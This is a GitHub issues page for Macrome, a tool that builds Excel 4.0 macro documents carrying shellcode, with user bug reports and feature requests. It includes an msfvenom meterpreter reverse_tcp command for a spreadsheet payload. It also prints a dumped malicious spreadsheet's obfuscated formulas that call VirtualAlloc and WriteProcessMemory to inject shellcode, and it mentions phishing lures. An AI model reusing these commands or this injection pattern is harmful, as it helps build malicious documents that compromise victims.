
macrome's People

Contributors

kafkaesqu3, michaelweber, sneakyottersec


macrome's Issues

error

Does not work on Office 16 and 2019, x64.

A crash occurs and it exits.

My command:

 ./Macrome build --decoy-document Docs/decoy_document.xls --payload Docs/popcalc.bin --payload64-bit Docs/popcalc64.bin

build file:
poc.zip

How do I use msf to get a reverse shell? It crashes here

msfvenom -a x86 -b '\x00' -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=1123 EXITFUNC=thread -f raw > t86.bin
dotnet Macrome.dll build --decoy-document decoy_document.xls --payload t86.bin

When I open output.xls, it crashes when I enable macros

Decoy Documents can only have 1 sheet

Decoy documents should be able to have any number of sheets - right now it's essentially hard coded to assume the sheet is in position 1. This should be fixed.

Why does my xls just keep loading and get stuck?

Build args like: .\Macrome.exe build --decoy-document 1.xls --payload payload.bin --payload-method Base64 --method ArgumentSubroutines --password VelvetSweatshop --output-file-name ReadyToPhish11.xls on Windows 11, x64 version

Formula too long

Macro provided by Excelntdonut using --obfuscate on Excelntdonut; it says the formula is too long, maximum 255 characters.

Dotnet supported version

Hi. Great work! Does it need a specific version of the dotnet SDK installed? I installed the latest one for Windows on a Windows 10 VM and built it without issues. When I run the DLL with the command "dotnet macrome.dll --build etc etc etc..." I get an error stating that version 2.0 is not installed on the machine, and it gives me the URL to download it. It's no longer supported, but I guess I can find it somewhere; the question is "do I really need it?". Thanks!

Not working in Excel 2016 32-bit

Hi,

I tried to use it and got an error about the format of cells; I took screenshots:

https://ibb.co/TBR5bP5
https://ibb.co/HNScKb1

Then GoTo and the contents of the cell with the error are:

=FORMULA($FE$512;$A$1)

Command to generate, very basic:

Macrome.exe build --decoy-document decoy_document.xls --payload popcalc.bin --output-file-name CharSubroutine-Macro_calc32.xls

OS version and Excel - Windows 10, Excel 2016 32bit.

I do not know what else to add, except that I can do the PoC from the article https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/ for calc32 or for Metasploit on the same machine and Excel.

cobaltstrike

First, thanks for sharing such a great tool, but it crashes when using Cobalt Strike RAW shellcode. Any idea why? Thanks

XOR Obfuscated Documents cannot have normal Images

I have no idea why this happens, but if you use the --password flag, your decoy document can't have a normal embedded image. To get around this, my example uses a tiled background, but that's not something you're going to use in a common phishing lure.

Payload

How to use this with putty rather than popcalc or a Metasploit-generated payload?

Sequence contains no elements.

Hello @michaelweber, first of all thanks for this amazing tool!
I am playing around with this tool and testing locally, and all works. Now that I'm onto the Macros section, I read it can import your own created macros.

My macro_example.txt is this one:
=ALERT("Excel document is outdated")
=QUIT()

Macrome.dll build --decoy-document decoy_document.xls --payload macro_example.txt --payload-type Macro and I get this error:

Unhandled exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.InvalidOperationException: Sequence contains no elements

As it uses a very basic, simple macro, as you can see, and I can't get it working, if you can give me any clue or anything I would appreciate it. Thanks @michaelweber

Auto_open Never Triggers

Hi,

Auto_open never triggers in Excel 2019 32 Bit (Language: Turkish) version.

I have tried it with both Macrome and the test macro below with International Macro Sheet. I am also sending the sample file attached.

=EXEC("notepad.exe")
=HALT()

test-4.0.zip

Do you have any advice?

Crashes attempting to dump malicious spreadsheet

I get the following errors when trying to dump a malicious spreadsheet:

C:\Users\jm460\Downloads\macrome>Macrome.exe dump --path C:\Users\jm460\Downloads\macrome\deobfuscated.xls
BoundSheet8 (0x10 bytes) - flags: 0x0 | SheetType: Macrosheet | HiddenState: Visible | Name [unicode=False]: qUKYONz;
BoundSheet8 (0xE bytes) - flags: 0x0 | SheetType: Worksheet | HiddenState: Visible | Name [unicode=False]: Sheet1
BIFF RecordType: SupBook - Length: 4
BIFF RecordType: ExternSheet - Length: 14
Lbl (0x1D bytes) - flags: 0xB | fBuiltin: False | fHidden: True | Name [unicode=False]: _xlfn.BITXOR | Formula: #NAME?
Lbl (0x17 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: ajeZFUwb
Lbl (0x20 bytes) - flags: 0x20 | fBuiltin: True | fHidden: False | Name [unicode=False]: Auto_Open1uto_Open1 !AUTO_OPEN! | Formula: qUKYONz;!A1
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button144_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button145_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button146_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button147_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button148_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button149_Click
Lbl (0x17 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: cecvdVub
Lbl (0x17 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: ikXOTAkJ
Lbl (0x1B bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: JIpHQ | Formula: qUKYONz;!F1
Lbl (0x15 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: KtyKQp
Lbl (0x15 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: viaBBg
Formula[A1]: ACTIVATE("qUKYONz;")
Formula[F1]: ARGUMENT("KtyKQp",2)
Formula[A2]: JIpHQ("=RE"&"GIS"&"TER(CHAR(109)&CHAR(115)&CHAR(118)&CHAR(99)&CHAR(114)&CHAR(116), CHAR(103)&CHAR(101)&CHAR(116)&CHAR(101)&CHAR(110)&CHAR(118), ""CC"", ""ajeZFUwb"", , 1, 9)")
Formula[F2]: FORMULA(KtyKQp,F3)
Formula[A3]: ajeZFUwb("USERDOMAIN")
Formula[A4]: IF(ISNUMBER(SEARCH("64",GET.WORKSPACE(1))))
Formula[F4]: FORMULA("",F3)
Formula[A5]: JIpHQ("=RE"&"GIS"&"TER(CHAR(75)&CHAR(69)&CHAR(82)&CHAR(78)&CHAR(69)&CHAR(76)&""32"", CHAR(86)&CHAR(105)&CHAR(114)&CHAR(116)&CHAR(117)&CHAR(97)&CHAR(108)&CHAR(65)&CHAR(108)&CHAR(108)&CHAR(111)&CHAR(99), ""JJJJJ"", ""cecvdVub"", , 1, 9)")
Formula[F5]: RETURN()
Formula[A6]: SET.VALUE(C6,0)
Formula[A7]: SET.VALUE(C7,65536)
Formula[A8]: WHILE(C6=0)
Formula[A9]: SET.VALUE(C7,C7+8192)
Formula[A10]: cecvdVub(C7,1024,12288,64)
Formula[A11]: SET.VALUE(C6,A10)
Formula[A12]: NEXT()
Formula[A13]: JIpHQ("=RE"&"GIS"&"TER(CHAR(75)&CHAR(69)&CHAR(82)&CHAR(78)&CHAR(69)&CHAR(76)&""32"",CHAR(87)&CHAR(114)&CHAR(105)&CHAR(116)&CHAR(101)&CHAR(80)&CHAR(114)&""oces""&CHAR(115)&CHAR(77)&CHAR(101)&CHAR(109)&CHAR(111)&CHAR(114)&CHAR(121),""JJJCJE"",""viaBBg"",,1,9)")
Unhandled exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.InvalidOperationException: Stack empty.
at System.Collections.Generic.Stack1.ThrowForEmptyStack()
at System.Collections.Generic.Stack1.Pop()
at b2xtranslator.xls.XlsFileFormat.PtgHelper.GetFormulaStringInner(Stack1& ptgStack, Boolean showAttributes) in C:\Users\Weber\source\repos\michaelweber\Macrome\b2xtranslator\Xls\XlsFileFormat\PtgHelper.cs:line 255
at b2xtranslator.xls.XlsFileFormat.PtgHelper.GetFormulaString(Stack1 ptgStack, Boolean showAttributes) in C:\Users\Weber\source\repos\michaelweber\Macrome\b2xtranslator\Xls\XlsFileFormat\PtgHelper.cs:line 370
at b2xtranslator.Spreadsheet.XlsFileFormat.Records.Formula.ToFormulaString(Boolean showAttributes) in C:\Users\Weber\source\repos\michaelweber\Macrome\b2xtranslator\Xls\XlsFileFormat\Records\Formula.cs:line 261
at Macrome.BiffRecordExtensions.ToHexDumpString(BiffRecord record, Int32 maxLength, Boolean showAttrInfo) in C:\Users\Weber\source\repos\michaelweber\Macrome\BiffRecordExtensions.cs:line 85
at Macrome.Program.Dump(FileInfo path, Boolean dumpAll, Boolean showAttrInfo, Boolean dumpHexBytes) in C:\Users\Weber\source\repos\michaelweber\Macrome\Program.cs:line 85
--- End of inner exception stack trace ---
at System.RuntimeMethodHandle.InvokeMethod(Object target, Object[] arguments, Signature sig, Boolean constructor)
at System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal(Object obj, Object[] parameters, Object[] arguments)
at System.CommandLine.Invocation.ModelBindingCommandHandler.d__8.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Invocation.InvocationPipeline.<>c__DisplayClass4_0.<b__0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__20_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c__DisplayClass15_0.<b__0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c__DisplayClass24_0.<b__0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c__DisplayClass22_0.<b__0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__21_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__19_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__11_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__10_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c__DisplayClass13_0.<b__0>d.MoveNext()

Auto_Open Obfuscation breaks auto execution on macOS

It appears that some of my Unicode fun for obfuscating the Auto_Open label doesn't fly on the macOS version of Office. It should be possible to disable the obfuscation (which currently ALWAYS happens regardless of what you call your label) with a flag. I suspect this is also breaking Auto_Open functionality for some international language settings.
